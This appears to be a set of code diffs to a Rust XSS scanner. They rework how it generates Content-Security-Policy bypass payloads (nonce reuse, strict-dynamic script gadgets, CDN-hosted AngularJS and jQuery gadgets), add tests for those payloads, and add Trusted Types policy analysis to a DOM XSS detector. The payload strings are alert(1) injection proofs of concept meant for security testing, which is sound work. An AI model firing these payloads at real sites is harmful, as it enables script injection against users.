+    // allowlist, so a plain `<script src=allowed-host>` no longer loads — only
+    // DOM script-gadgets (a trusted script creating the attacker script) and
+    // nonce reuse survive. Without `strict-dynamic`, a whitelisted host that
+    // serves a JSONP/gadget endpoint is directly loadable.
+    if analysis.has_strict_dynamic {
+        // Nonce reuse: an injected <script> bearing a captured nonce executes
+        // when that nonce is static / predictable / reflected into the sink.
+        for nonce in &analysis.nonce_values {
             payloads.push(format!(
-                "<script src=\"https://www.google.com/complete/search?client=chrome&q=xss&callback=alert\" class={}></script>",
-                class_marker
+                "<script nonce={} class={}>alert(1)</script>",
+                nonce, class_marker
+            ));
+            payloads.push(format!(
+                "<script nonce={} src=\"data:text/javascript,alert(1)\" id={}></script>",
+                nonce, id_marker
             ));
         }
-        // Angular CDN — template injection via Angular bootstrap
-        if d.contains("angularjs.org")
-            || d.contains("angular")
-            || d.contains("cdnjs.cloudflare.com")
-        {
-            payloads.push(format!(
-                "<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js\" class={}></script><div ng-app ng-csp>{{{{$eval.constructor('alert(1)')()}}}}</div>",
-                class_marker
+        // DOM script-gadgets that survive strict-dynamic.
+        for gadget in crate::payload::gadget_db::strict_dynamic_gadgets() {
+            payloads.push(crate::payload::gadget_db::render(
+                gadget.template,
+                class_marker,
+                id_marker,
             ));
         }
-        // jQuery CDN
-        if d.contains("jquery") || d.contains("code.jquery.com") {
-            payloads.push(format!(
-                "<script src=\"https://code.jquery.com/jquery-3.6.0.min.js\" class={}></script><img src=x onerror=$.globalEval('alert(1)')>",
-                class_marker
-            ));
-        }
-        // unpkg / jsdelivr — universal gadget
-        if d.contains("unpkg.com") || d.contains("jsdelivr.net") {
-            payloads.push(format!(
-                "<script src=\"https://cdn.jsdelivr.net/npm/angular@1.6.0/angular.min.js\" class={}></script><div ng-app ng-csp>{{{{$eval.constructor('alert(1)')()}}}}</div>",
-                class_marker
-            ));
+    } else {
+        // Host-allowlist CSP: emit the gadgets whose host pattern matches an
+        // allowed origin (replaces the former hardcoded CDN branches).
+        for domain in &analysis.whitelisted_domains {
+            for gadget in crate::payload::gadget_db::gadgets_for_host(domain) {
+                payloads.push(crate::payload::gadget_db::render(
+                    gadget.template,
+                    class_marker,
+                    id_marker,
+                ));
+            }
         }
     }
 
+    dedup_preserve_order(payloads)
+}
+
+/// De-duplicate payloads while preserving first-occurrence order. The gadget DB
+/// can yield the same template for several matching host patterns (e.g. a
+/// `jquery`/`ajax.googleapis.com` double match), so collapse repeats to keep the
+/// per-parameter request count from growing.
+fn dedup_preserve_order(payloads: Vec<String>) -> Vec<String> {
+    let mut seen = std::collections::HashSet::with_capacity(payloads.len());
     payloads
+        .into_iter()
+        .filter(|p| seen.insert(p.clone()))
+        .collect()
 }
 
 #[cfg(test)]

--- a/src/payload/xss_csp_bypass/tests.rs
+++ b/src/payload/xss_csp_bypass/tests.rs
@@ -350,11 +350,29 @@ fn test_unsafe_inline_is_gadget_bypassable() {
 fn test_strict_dynamic_emits_nonce_reuse_payloads() {
     let analysis = analyze_csp("script-src 'strict-dynamic' 'nonce-PRED1CT4BLE'");
     let payloads = get_csp_bypass_payloads(&analysis);
-    // Nonce reuse: an injected <script> carrying the captured nonce.
+    // Nonce reuse: an injected <script> carrying the captured nonce. The value
+    // is quoted so a base64 nonce containing `=` stays intact in the attribute.
     assert!(
         payloads
             .iter()
-            .any(|p| p.contains("nonce=PRED1CT4BLE") && p.contains("<script"))
+            .any(|p| p.contains("nonce=\"PRED1CT4BLE\"") && p.contains("<script"))
+    );
+}
+
+#[test]
+fn test_strict_dynamic_nonce_value_is_quoted() {
+    // A real base64 nonce ends in `=`; the emitted attribute must quote it so
+    // the value isn't truncated in an unquoted HTML attribute.
+    let analysis = analyze_csp("script-src 'strict-dynamic' 'nonce-YWJjZA=='");
+    let payloads = get_csp_bypass_payloads(&analysis);
+    assert!(
+        payloads.iter().any(|p| p.contains("nonce=\"YWJjZA==\"")),
+        "base64 nonce with '=' padding must be emitted quoted and intact"
+    );
+    // And never unquoted (which would truncate at the first `=`).
+    assert!(
+        payloads.iter().all(|p| !p.contains("nonce=YWJjZA")),
+        "nonce must not be emitted unquoted"
     );
 }
 

--- a/src/payload/xss_csp_bypass/tests.rs
+++ b/src/payload/xss_csp_bypass/tests.rs
@@ -210,3 +210,213 @@ fn test_bypass_payloads_jsdelivr_gadget() {
     let payloads = get_csp_bypass_payloads(&analysis);
     assert!(payloads.iter().any(|p| p.contains("jsdelivr.net")));
 }
+
+// --- nonce / hash parsing -------------------------------------------------
+
+#[test]
+fn test_analyze_csp_parses_nonce_value_case_preserved() {
+    let analysis = analyze_csp("script-src 'nonce-AbC123==' 'strict-dynamic'");
+    assert_eq!(analysis.nonce_values, vec!["AbC123==".to_string()]);
+    // The nonce token must not leak into the host allowlist.
+    assert!(analysis.whitelisted_domains.is_empty());
+}
+
+#[test]
+fn test_analyze_csp_parses_multiple_nonces() {
+    let analysis = analyze_csp("script-src 'nonce-aaa' 'nonce-bbb'");
+    assert_eq!(
+        analysis.nonce_values,
+        vec!["aaa".to_string(), "bbb".to_string()]
+    );
+}
+
+#[test]
+fn test_analyze_csp_empty_nonce_ignored() {
+    let analysis = analyze_csp("script-src 'nonce-'");
+    assert!(analysis.nonce_values.is_empty());
+}
+
+#[test]
+fn test_analyze_csp_parses_hashes() {
+    let analysis = analyze_csp("script-src 'sha256-abc123=' 'sha384-def' 'sha512-ghi'");
+    assert_eq!(
+        analysis.hash_values,
+        vec![
+            "sha256-abc123=".to_string(),
+            "sha384-def".to_string(),
+            "sha512-ghi".to_string()
+        ]
+    );
+    assert!(analysis.whitelisted_domains.is_empty());
+}
+
+#[test]
+fn test_analyze_csp_nonce_not_whitelisted_with_host() {
+    let analysis = analyze_csp("script-src 'nonce-xyz' https://cdn.example.com");
+    assert_eq!(analysis.nonce_values, vec!["xyz".to_string()]);
+    assert_eq!(
+        analysis.whitelisted_domains,
+        vec!["https://cdn.example.com".to_string()]
+    );
+}
+
+// --- Trusted Types directive parsing --------------------------------------
+
+#[test]
+fn test_analyze_csp_require_trusted_types_for_script() {
+    let analysis = analyze_csp("require-trusted-types-for 'script'");
+    assert!(analysis.require_trusted_types_for);
+}
+
+#[test]
+fn test_analyze_csp_require_trusted_types_for_unquoted() {
+    // Some servers omit the quotes; accept both spellings.
+    let analysis = analyze_csp("require-trusted-types-for script");
+    assert!(analysis.require_trusted_types_for);
+}
+
+#[test]
+fn test_analyze_csp_no_require_trusted_types_by_default() {
+    let analysis = analyze_csp("script-src 'self'");
+    assert!(!analysis.require_trusted_types_for);
+    assert!(analysis.trusted_types.is_none());
+}
+
+#[test]
+fn test_analyze_csp_trusted_types_policy_list() {
+    let analysis = analyze_csp("trusted-types default dompurify 'allow-duplicates'");
+    let tt = analysis.trusted_types.expect("trusted-types parsed");
+    assert_eq!(
+        tt,
+        vec![
+            "default".to_string(),
+            "dompurify".to_string(),
+            "allow-duplicates".to_string()
+        ]
+    );
+}
+
+#[test]
+fn test_analyze_csp_trusted_types_empty_means_no_policies() {
+    let analysis = analyze_csp("trusted-types;");
+    assert_eq!(analysis.trusted_types, Some(vec![]));
+}
+
+// --- classification helpers ----------------------------------------------
+
+#[test]
+fn test_is_nonce_or_hash_based() {
+    assert!(analyze_csp("script-src 'nonce-x'").is_nonce_or_hash_based());
+    assert!(analyze_csp("script-src 'sha256-x='").is_nonce_or_hash_based());
+    assert!(!analyze_csp("script-src 'self' https://cdn.example.com").is_nonce_or_hash_based());
+}
+
+#[test]
+fn test_hardened_nonce_only_csp() {
+    // nonce + hash, no strict-dynamic, no unsafe-*, no gadget host → hardened.
+    let analysis =
+        analyze_csp("script-src 'nonce-r4nd0m' 'sha256-abc='; object-src 'none'; base-uri 'none'");
+    assert!(analysis.is_hardened());
+    assert!(!analysis.is_gadget_bypassable());
+    // And it emits no actionable script-execution payloads beyond what missing
+    // directives (none here) would add.
+    let payloads = get_csp_bypass_payloads(&analysis);
+    assert!(payloads.iter().all(|p| !p.contains("nonce=")));
+}
+
+#[test]
+fn test_gadget_bypassable_strict_dynamic() {
+    let analysis = analyze_csp("script-src 'nonce-r4nd0m' 'strict-dynamic'");
+    assert!(analysis.is_gadget_bypassable());
+    assert!(!analysis.is_hardened());
+}
+
+#[test]
+fn test_gadget_bypassable_whitelisted_gadget_host() {
+    let analysis = analyze_csp("script-src 'nonce-x' https://cdnjs.cloudflare.com");
+    assert!(analysis.is_gadget_bypassable());
+    assert!(!analysis.is_hardened());
+}
+
+#[test]
+fn test_unsafe_inline_is_gadget_bypassable() {
+    let analysis = analyze_csp("script-src 'unsafe-inline'");
+    assert!(analysis.is_gadget_bypassable());
+}
+
+// --- strict-dynamic payload generation ------------------------------------
+
+#[test]
+fn test_strict_dynamic_emits_nonce_reuse_payloads() {
+    let analysis = analyze_csp("script-src 'strict-dynamic' 'nonce-PRED1CT4BLE'");
+    let payloads = get_csp_bypass_payloads(&analysis);
+    // Nonce reuse: an injected <script> carrying the captured nonce.
+    assert!(
+        payloads
+            .iter()
+            .any(|p| p.contains("nonce=PRED1CT4BLE") && p.contains("<script"))
+    );
+}
+
+#[test]
+fn test_strict_dynamic_emits_dom_gadgets() {
+    let analysis = analyze_csp("script-src 'strict-dynamic' 'nonce-x'");
+    let payloads = get_csp_bypass_payloads(&analysis);
+    // DOM script-gadgets survive strict-dynamic; require.js data-main and the
+    // document.write self-propagating gadget are the canonical ones.
+    assert!(payloads.iter().any(|p| p.contains("data-main")));
+    assert!(payloads.iter().any(|p| p.contains("document.write")));
+}
+
+#[test]
+fn test_strict_dynamic_without_nonce_still_emits_dom_gadgets() {
+    // hash-pinned strict-dynamic with no nonce: no nonce-reuse payload, but the
+    // DOM gadgets still apply.
+    let analysis = analyze_csp("script-src 'strict-dynamic' 'sha256-abc='");
+    let payloads = get_csp_bypass_payloads(&analysis);
+    assert!(payloads.iter().all(|p| !p.contains("nonce=")));
+    assert!(payloads.iter().any(|p| p.contains("data-main")));
+}
+
+#[test]
+fn test_strict_dynamic_ignores_host_allowlist_gadgets() {
+    // Under strict-dynamic the host allowlist is ignored, so a plain
+    // host-loaded JSONP gadget (Google complete/search) must NOT be emitted —
+    // only the DOM script-gadgets that survive strict-dynamic.
+    let analysis = analyze_csp("script-src 'strict-dynamic' 'nonce-x' https://ajax.googleapis.com");
+    let payloads = get_csp_bypass_payloads(&analysis);
+    assert!(
+        payloads
+            .iter()
+            .all(|p| !p.contains("google.com/complete/search")),
+        "host-allowlist JSONP gadget should be suppressed under strict-dynamic"
+    );
+}
+
+#[test]
+fn test_payloads_are_deduped() {
+    // A host matching multiple gadget patterns must not yield duplicate payloads.
+    let analysis = CspAnalysis {
+        whitelisted_domains: vec![
+            "https://code.jquery.com".to_string(),
+            "https://code.jquery.com".to_string(),
+        ],
+        ..Default::default()
+    };
+    let payloads = get_csp_bypass_payloads(&analysis);
+    let mut sorted = payloads.clone();
+    sorted.sort();
+    sorted.dedup();
+    assert_eq!(sorted.len(), payloads.len(), "payloads must be unique");
+}
+
+#[test]
+fn test_report_only_and_full_csp_parse_identically() {
+    // analyze_csp takes only the value, so report-only headers (handled at the
+    // header layer) parse the same directives.
+    let value = "script-src 'nonce-abc' 'strict-dynamic'; require-trusted-types-for 'script'";
+    let analysis = analyze_csp(value);
+    assert!(analysis.has_strict_dynamic);
+    assert_eq!(analysis.nonce_values, vec!["abc".to_string()]);
+    assert!(analysis.require_trusted_types_for);
+}

--- a/src/scanning/ast_dom_analysis.rs
+++ b/src/scanning/ast_dom_analysis.rs
@@ -1335,6 +1335,11 @@ impl<'a> DomXssVisitor<'a> {
     /// `createHTML`, a value could reach the sink as an already-`TrustedHTML`
     /// (but unsanitized) object the default policy never re-checks — so we do
     /// not suppress, keeping the finding.
+    ///
+    /// Scope note: analysis is per-`<script>` block, so `default_tt_policy` only
+    /// reflects a `'default'` policy defined in the *same* block as the sink. A
+    /// policy created in a separate block leaves this `None` here, so the
+    /// finding is kept — the safe (no-false-negative) direction.
     fn default_policy_suppresses_sink(&self, sink: &str) -> bool {
         if !self.trusted_types_enforced {
             return false;

--- a/src/scanning/ast_dom_analysis.rs
+++ b/src/scanning/ast_dom_analysis.rs
@@ -202,6 +202,45 @@ enum PromiseValueKind {
     Unknown,
 }
 
+/// Strictness of a Trusted Types policy `create*` callback.
+#[derive(Clone, Copy, PartialEq, Eq, Debug)]
+enum TtStrictness {
+    /// The callback genuinely neutralizes its input — it returns a recognised
+    /// sanitizer's output, or never returns the raw parameter at all. Routing a
+    /// tainted value through such a callback (or its auto-applied default
+    /// policy) is safe, so the finding is a false positive and is suppressed.
+    Strict,
+    /// Identity / passthrough (`x => x`), trivial wrapping, or a body we cannot
+    /// prove safe. The conservative default: taint is *kept*, so a permissive
+    /// `createPolicy('default', {createHTML: x=>x})` is correctly flagged as a
+    /// bypassable no-op rather than mistaken for protection.
+    Permissive,
+}
+
+/// Per-method strictness of a `trustedTypes.createPolicy(name, {...})` policy.
+/// Methods absent from the config default to [`TtStrictness::Permissive`] so an
+/// unanalyzable policy never suppresses a finding (no false negative).
+#[derive(Clone, Copy)]
+struct TtPolicyInfo {
+    create_html: TtStrictness,
+    create_script: TtStrictness,
+    create_script_url: TtStrictness,
+}
+
+/// The first parameter of a Trusted Types `create*` callback, as far as the
+/// classifier can reason about it.
+enum TtParam {
+    /// No parameter at all (and no rest param) — the callback can't reference
+    /// the untrusted input, so its result is input-independent.
+    None,
+    /// A plain `BindingIdentifier` we can track by name.
+    Named(String),
+    /// A default (`s = ''`), destructured (`{h}`), or rest (`...args`) param —
+    /// the input is reachable but not trackable by a simple name, so the
+    /// callback is treated conservatively (permissive).
+    Complex,
+}
+
 /// AST visitor for DOM XSS analysis
 struct DomXssVisitor<'a> {
     /// Set of tainted variable names
@@ -282,6 +321,25 @@ struct DomXssVisitor<'a> {
     /// borrowing `self` — the walkers take `&mut self`, which a `&self`-borrow
     /// held across the call would conflict with.
     recursion_depth: Rc<Cell<u32>>,
+    /// Whether `require-trusted-types-for 'script'` is enforced for this page
+    /// (threaded from the response CSP). Gates the program-wide default-policy
+    /// suppression: without enforcement a `'default'` policy is inert, so we
+    /// never suppress on its account — preserving today's findings exactly.
+    trusted_types_enforced: bool,
+    /// `policyVar -> per-method strictness` for `const p = trustedTypes
+    /// .createPolicy(name, {...})`. Lets `p.createHTML(taint)` be treated as a
+    /// (strict) sanitizer or a (permissive) no-op. Populated as the walk passes
+    /// each binding, so a policy defined before a sink is known at the sink; a
+    /// policy defined *after* simply isn't applied (the finding is kept — the
+    /// safe direction).
+    tt_policies: HashMap<String, TtPolicyInfo>,
+    /// Strictness of the auto-applied `'default'` policy, when one is defined in
+    /// this block. Used — only under [`trusted_types_enforced`] — to suppress
+    /// TrustedHTML-sink findings the browser's default `createHTML` would
+    /// neutralize.
+    ///
+    /// [`trusted_types_enforced`]: DomXssVisitor::trusted_types_enforced
+    default_tt_policy: Option<TtPolicyInfo>,
 }
 
 /// RAII token returned by [`DomXssVisitor::enter_recursion`]; decrements the
@@ -688,11 +746,23 @@ impl<'a> DomXssVisitor<'a> {
             response_object_vars: HashSet::new(),
             branch_depth: 0,
             recursion_depth: Rc::new(Cell::new(0)),
+            trusted_types_enforced: false,
+            tt_policies: HashMap::new(),
+            default_tt_policy: None,
         }
     }
 
     fn with_script_element_ids(mut self, ids: HashSet<String>) -> Self {
         self.script_element_ids = ids;
+        self
+    }
+
+    /// Mark that the page enforces `require-trusted-types-for 'script'`, so a
+    /// strict `'default'` Trusted Types policy genuinely neutralizes TrustedHTML
+    /// sinks and those findings can be suppressed. Off by default — when off,
+    /// behaviour is identical to before Trusted Types awareness existed.
+    fn with_trusted_types_enforced(mut self, enforced: bool) -> Self {
+        self.trusted_types_enforced = enforced;
         self
     }
 
@@ -974,6 +1044,310 @@ impl<'a> DomXssVisitor<'a> {
             return true;
         }
         false
+    }
+
+    // --- Trusted Types policy recognition ---------------------------------
+    //
+    // A `trustedTypes.createPolicy(name, { createHTML, createScript,
+    // createScriptURL })` registers conversion callbacks. Two shapes matter:
+    //   * an *explicit* wrapper call `policy.createHTML(x)` whose result feeds a
+    //     sink — a strict callback sanitizes `x` (taint cleared), a permissive
+    //     one (`x => x`) does not (taint kept, finding flagged);
+    //   * the `'default'` policy, which the browser auto-applies to every
+    //     TrustedHTML sink *when `require-trusted-types-for` is enforced* — a
+    //     strict default `createHTML` neutralizes those sinks (see
+    //     [`default_policy_suppresses_sink`]).
+    //
+    // [`default_policy_suppresses_sink`]: DomXssVisitor::default_policy_suppresses_sink
+
+    /// If `call` is `trustedTypes.createPolicy(name, {...})` (bare or via
+    /// `window`/`self`/`globalThis`), return the static policy name (when
+    /// determinable) and its config object literal.
+    fn tt_create_policy_config<'b>(
+        &self,
+        call: &'b CallExpression<'a>,
+    ) -> Option<(Option<String>, &'b ObjectExpression<'a>)> {
+        let Expression::StaticMemberExpression(member) = &call.callee else {
+            return None;
+        };
+        if member.property.name.as_str() != "createPolicy" {
+            return None;
+        }
+        let is_trusted_types = matches!(
+            self.get_expr_string(&member.object).as_deref(),
+            Some(
+                "trustedTypes"
+                    | "window.trustedTypes"
+                    | "self.trustedTypes"
+                    | "globalThis.trustedTypes"
+            )
+        );
+        if !is_trusted_types {
+            return None;
+        }
+        let name = call
+            .arguments
+            .first()
+            .and_then(|a| a.as_expression())
+            .and_then(|e| self.eval_static_string_expr(e));
+        let config = call
+            .arguments
+            .get(1)
+            .and_then(|a| a.as_expression())
+            .and_then(|e| match e {
+                Expression::ObjectExpression(o) => Some(&**o),
+                _ => None,
+            });
+        config.map(|c| (name, c))
+    }
+
+    /// Same as [`tt_create_policy_config`] but accepts any expression (unwraps
+    /// parentheses), used for the inline `createPolicy(...).createHTML(x)` chain.
+    ///
+    /// [`tt_create_policy_config`]: DomXssVisitor::tt_create_policy_config
+    fn tt_create_policy_call<'b>(
+        &self,
+        expr: &'b Expression<'a>,
+    ) -> Option<(Option<String>, &'b ObjectExpression<'a>)> {
+        match expr {
+            Expression::CallExpression(call) => self.tt_create_policy_config(call),
+            Expression::ParenthesizedExpression(p) => self.tt_create_policy_call(&p.expression),
+            _ => None,
+        }
+    }
+
+    /// First parameter of a `create*` callback, classified for the strictness
+    /// analysis. A default/destructured/rest param is [`TtParam::Complex`]
+    /// (reachable input we can't name-track → conservatively permissive); only a
+    /// plain identifier is trackable, and only a genuinely empty parameter list
+    /// is [`TtParam::None`].
+    fn tt_callback_param(params: &FormalParameters<'a>) -> TtParam {
+        match params.items.first() {
+            Some(p) => match &p.pattern {
+                BindingPattern::BindingIdentifier(id) => TtParam::Named(id.name.to_string()),
+                _ => TtParam::Complex,
+            },
+            None if params.rest.is_some() => TtParam::Complex,
+            None => TtParam::None,
+        }
+    }
+
+    /// Classify a policy `create*` callback as strict (genuinely sanitizing) or
+    /// permissive. Conservative by construction: anything not *provably* safe is
+    /// permissive, so the taint is kept and no false negative is introduced.
+    ///
+    /// A callback is strict only when:
+    ///   * it has no trackable parameter at all (can't pass the input through); or
+    ///   * its return expression is a recognised sanitizer call **and** the
+    ///     parameter is referenced *only* inside that call — i.e. no other
+    ///     statement (a guarded `return s`, a `'<b>'+s` concat, …) leaks the raw
+    ///     input. The reference test is textual over the whole body source, so
+    ///     it catches passthrough at any nesting depth and in any return path,
+    ///     and only ever errs toward permissive.
+    fn classify_tt_create_method(&self, fn_expr: &Expression<'a>) -> TtStrictness {
+        let (params, stmts): (
+            &FormalParameters<'a>,
+            &oxc_allocator::Vec<'a, Statement<'a>>,
+        ) = match fn_expr {
+            Expression::ArrowFunctionExpression(arrow) => (&arrow.params, &arrow.body.statements),
+            Expression::FunctionExpression(func) => match &func.body {
+                Some(body) => (&func.params, &body.statements),
+                None => return TtStrictness::Permissive,
+            },
+            // Not a callback we can analyze (e.g. a bare identifier reference)
+            // — assume the worst: permissive, so the finding is kept.
+            _ => return TtStrictness::Permissive,
+        };
+
+        let param = Self::tt_callback_param(params);
+        // A default/destructured/rest param routes the input through in a way we
+        // can't name-track — keep the finding.
+        let param_name = match &param {
+            TtParam::None => None,
+            TtParam::Named(name) => Some(name.as_str()),
+            TtParam::Complex => return TtStrictness::Permissive,
+        };
+
+        // The "result" expression used for sanitizer detection: an arrow concise
+        // body's expression, otherwise the first `return`.
+        let result = match fn_expr {
+            Expression::ArrowFunctionExpression(arrow) if arrow.expression => match stmts.first() {
+                Some(Statement::ExpressionStatement(stmt)) => Some(&stmt.expression),
+                _ => None,
+            },
+            _ => Self::first_return_expr(stmts),
+        };
+        let result = result.map(|mut r| {
+            while let Expression::ParenthesizedExpression(p) = r {
+                r = &p.expression;
+            }
+            r
+        });
+
+        // Body source (statements only — excludes the parameter list, so the
+        // parameter declaration itself never counts as a reference).
+        let body_src = self.stmts_source(stmts);
+
+        // (1) Result is a recognised sanitizer call. Grant strict only when the
+        //     parameter is referenced nowhere *outside* that call — otherwise
+        //     another path (e.g. `if (c) return s;`) could leak the raw input.
+        if let Some(Expression::CallExpression(call)) = result
+            && let Some(name) = self.get_expr_string(&call.callee)
+            && (self.sanitizers.contains(name.as_str()) || Self::is_likely_sanitizer_name(&name))
+        {
+            let Some(p) = param_name else {
+                return TtStrictness::Strict;
+            };
+            let call_src = self.expr_source(result.unwrap());
+            let rest = body_src.replacen(call_src, "", 1);
+            if rest.contains(p) {
+                return TtStrictness::Permissive;
+            }
+            return TtStrictness::Strict;
+        }
+
+        // (2) No sanitizer: strict only when the parameter is never referenced in
+        //     the body (input isn't passed through). The substring check
+        //     over-counts references, so it only ever errs toward permissive.
+        match param_name {
+            Some(p) => {
+                if body_src.contains(p) {
+                    TtStrictness::Permissive
+                } else {
+                    TtStrictness::Strict
+                }
+            }
+            None => TtStrictness::Strict,
+        }
+    }
+
+    /// Source text spanning a list of statements (first start .. last end),
+    /// empty when the list is empty. Used to inspect a callback body without
+    /// the surrounding braces or parameter list.
+    fn stmts_source(&self, stmts: &[Statement<'a>]) -> &'a str {
+        match (stmts.first(), stmts.last()) {
+            (Some(first), Some(last)) => self
+                .source_code
+                .get(first.span().start as usize..last.span().end as usize)
+                .unwrap_or(""),
+            _ => "",
+        }
+    }
+
+    /// Source text of a single expression.
+    fn expr_source(&self, expr: &Expression<'a>) -> &'a str {
+        let span = expr.span();
+        self.source_code
+            .get(span.start as usize..span.end as usize)
+            .unwrap_or("")
+    }
+
+    /// Build a [`TtPolicyInfo`] from a `createPolicy` config object literal.
+    fn build_tt_policy_info(&self, config: &ObjectExpression<'a>) -> TtPolicyInfo {
+        let mut info = TtPolicyInfo {
+            create_html: TtStrictness::Permissive,
+            create_script: TtStrictness::Permissive,
+            create_script_url: TtStrictness::Permissive,
+        };
+        for prop in &config.properties {
+            let oxc_ast::ast::ObjectPropertyKind::ObjectProperty(p) = prop else {
+                continue;
+            };
+            let Some(key) = self.get_property_key_name(&p.key) else {
+                continue;
+            };
+            match key.as_str() {
+                "createHTML" => info.create_html = self.classify_tt_create_method(&p.value),
+                "createScript" => info.create_script = self.classify_tt_create_method(&p.value),
+                "createScriptURL" => {
+                    info.create_script_url = self.classify_tt_create_method(&p.value)
+                }
+                _ => {}
+            }
+        }
+        info
+    }
+
+    /// Record a `var p = trustedTypes.createPolicy(name, {...})` binding so a
+    /// later `p.createHTML(x)` resolves, and remember the `'default'` policy.
+    /// Reassigning `p` to a non-policy clears the stale entry.
+    fn record_tt_policy_binding(&mut self, var_name: &str, init: &Expression<'a>) {
+        if let Some((name, config)) = self.tt_create_policy_call(init) {
+            let info = self.build_tt_policy_info(config);
+            self.tt_policies.insert(var_name.to_string(), info);
+            if name.as_deref() == Some("default") {
+                self.default_tt_policy = Some(info);
+            }
+        } else {
+            self.tt_policies.remove(var_name);
+        }
+    }
+
+    /// If `call` is a Trusted Types `create*` wrapper (`policy.createHTML(x)`,
+    /// `.createScript`, `.createScriptURL`) — either on a tracked policy
+    /// variable or an inline `createPolicy(...).createHTML(x)` chain — return
+    /// the strictness of the corresponding callback.
+    fn tt_wrapper_call_strictness(&self, call: &CallExpression<'a>) -> Option<TtStrictness> {
+        let Expression::StaticMemberExpression(member) = &call.callee else {
+            return None;
+        };
+        let pick = |info: &TtPolicyInfo| match member.property.name.as_str() {
+            "createHTML" => Some(info.create_html),
+            "createScript" => Some(info.create_script),
+            "createScriptURL" => Some(info.create_script_url),
+            _ => None,
+        };
+        if let Expression::Identifier(id) = &member.object
+            && let Some(info) = self.tt_policies.get(id.name.as_str())
+        {
+            return pick(info);
+        }
+        if let Some((_, config)) = self.tt_create_policy_call(&member.object) {
+            return pick(&self.build_tt_policy_info(config));
+        }
+        None
+    }
+
+    /// TrustedHTML-family sinks: the ones the browser routes through a Trusted
+    /// Types `createHTML` policy (including the default policy) under
+    /// enforcement. Script / ScriptURL sinks are intentionally excluded — they
+    /// use `createScript` / `createScriptURL`, which the default-policy
+    /// suppression does not model.
+    fn is_trusted_html_sink(sink: &str) -> bool {
+        matches!(
+            sink,
+            "innerHTML"
+                | "outerHTML"
+                | "insertAdjacentHTML"
+                | "createContextualFragment"
+                | "document.write"
+                | "document.writeln"
+                | "setHTMLUnsafe"
+                | "srcdoc"
+                | "html"
+        )
+    }
+
+    /// Whether an enforced, strict `'default'` Trusted Types policy neutralizes
+    /// this TrustedHTML sink, making the finding a false positive.
+    ///
+    /// FN guard: if *any* explicit policy in this block has a permissive
+    /// `createHTML`, a value could reach the sink as an already-`TrustedHTML`
+    /// (but unsanitized) object the default policy never re-checks — so we do
+    /// not suppress, keeping the finding.
+    fn default_policy_suppresses_sink(&self, sink: &str) -> bool {
+        if !self.trusted_types_enforced {
+            return false;
+        }
+        let Some(policy) = &self.default_tt_policy else {
+            return false;
+        };
+        if policy.create_html != TtStrictness::Strict || !Self::is_trusted_html_sink(sink) {
+            return false;
+        }
+        self.tt_policies
+            .values()
+            .all(|p| p.create_html == TtStrictness::Strict)
     }
 
     /// Evaluate an expression to a static string when possible.
@@ -1572,6 +1946,15 @@ impl<'a> DomXssVisitor<'a> {
             }
         }
 
+        // Trusted Types policy wrapper: `policy.createHTML(x)` / `.createScript`
+        // / `.createScriptURL`. A *strict* callback neutralizes its input like a
+        // sanitizer (taint cleared); a *permissive* one (`x => x`) does not, so
+        // we fall through and the argument's taint propagates — correctly
+        // flagging a `createPolicy('default', {createHTML: x=>x})` no-op.
+        if self.tt_wrapper_call_strictness(call) == Some(TtStrictness::Strict) {
+            return (false, None);
+        }
+
         // Sanitizers produce de-tainted values
         if let Some(func_name) = self.get_expr_string(&call.callee)
             && (self.sanitizers.contains(func_name.as_str())
@@ -1906,6 +2289,12 @@ impl<'a> DomXssVisitor<'a> {
         description: &str,
         explicit_source: Option<String>,
     ) {
+        // An enforced, strict `'default'` Trusted Types policy auto-sanitizes
+        // every TrustedHTML sink, so such a finding is a false positive.
+        if self.default_policy_suppresses_sink(sink) {
+            return;
+        }
+
         let offset = span.start as usize;
         // Binary search for the line containing this byte offset
         let line_idx = match self.line_starts.binary_search(&offset) {
@@ -2355,6 +2744,11 @@ impl<'a> DomXssVisitor<'a> {
                 } else {
                     self.script_element_vars.remove(var_name);
                 }
+
+                // `const p = trustedTypes.createPolicy(name, {...})` — track the
+                // policy so a later `p.createHTML(x)` resolves, and note the
+                // auto-applied `'default'` policy.
+                self.record_tt_policy_binding(var_name, init);
 
                 let mut assigned_url_search_params_source = false;
                 if let Expression::StaticMemberExpression(member) = init
@@ -3403,6 +3797,10 @@ impl<'a> DomXssVisitor<'a> {
                 if !assigned_bind_alias {
                     self.bound_function_aliases.remove(target_name);
                 }
+
+                // `p = trustedTypes.createPolicy(name, {...})` assignment form.
+                self.record_tt_policy_binding(target_name, &assign.right);
+
                 // Propagate taint through direct assignments like `a = taintedValue;`
                 if right_tainted {
                     self.tainted_vars.insert(target_name.to_string());
@@ -3447,6 +3845,15 @@ impl<'a> DomXssVisitor<'a> {
 
     /// Walk through a call expression
     fn walk_call_expression(&mut self, call: &CallExpression<'a>) {
+        // Standalone `trustedTypes.createPolicy('default', {...})` (not bound to
+        // a variable) still registers the auto-applied default policy.
+        if let Some((name, config)) = self.tt_create_policy_config(call)
+            && name.as_deref() == Some("default")
+        {
+            let info = self.build_tt_policy_info(config);
+            self.default_tt_policy = Some(info);
+        }
+
         // fetch().then(...) response-source chains (issue #1024). Drive the
         // whole chain here so each callback body is walked with the resolved
         // Response / tainted value bound to its parameter, then return.
@@ -4145,6 +4552,11 @@ pub struct AstDomAnalyzer {
     /// (see `ast_integration::extract_script_element_ids`). Empty when
     /// the caller has no HTML context.
     script_element_ids: HashSet<String>,
+    /// Whether the response CSP enforces `require-trusted-types-for 'script'`.
+    /// Threaded into the visitor to gate strict-default-policy suppression.
+    /// Off by default — preserving pre-Trusted-Types behaviour for callers
+    /// without CSP context.
+    trusted_types_enforced: bool,
 }
 
 impl AstDomAnalyzer {
@@ -4158,6 +4570,14 @@ impl AstDomAnalyzer {
     /// recognised as a JS-eval sink even when the lookup is inline.
     pub fn with_script_element_ids(mut self, ids: HashSet<String>) -> Self {
         self.script_element_ids = ids;
+        self
+    }
+
+    /// Mark that the response CSP enforces `require-trusted-types-for 'script'`,
+    /// so a strict `'default'` Trusted Types policy in the page neutralizes
+    /// TrustedHTML sinks and those (now false-positive) findings are suppressed.
+    pub fn with_trusted_types_enforced(mut self, enforced: bool) -> Self {
+        self.trusted_types_enforced = enforced;
         self
     }
 
@@ -4193,13 +4613,14 @@ impl AstDomAnalyzer {
         }
 
         let script_element_ids = self.script_element_ids.clone();
+        let trusted_types_enforced = self.trusted_types_enforced;
 
         // Fast path: a script this small can't nest a parser-recursion vector
         // deep enough to overflow a normal worker stack (see [`INLINE_PARSE_BYTES`]),
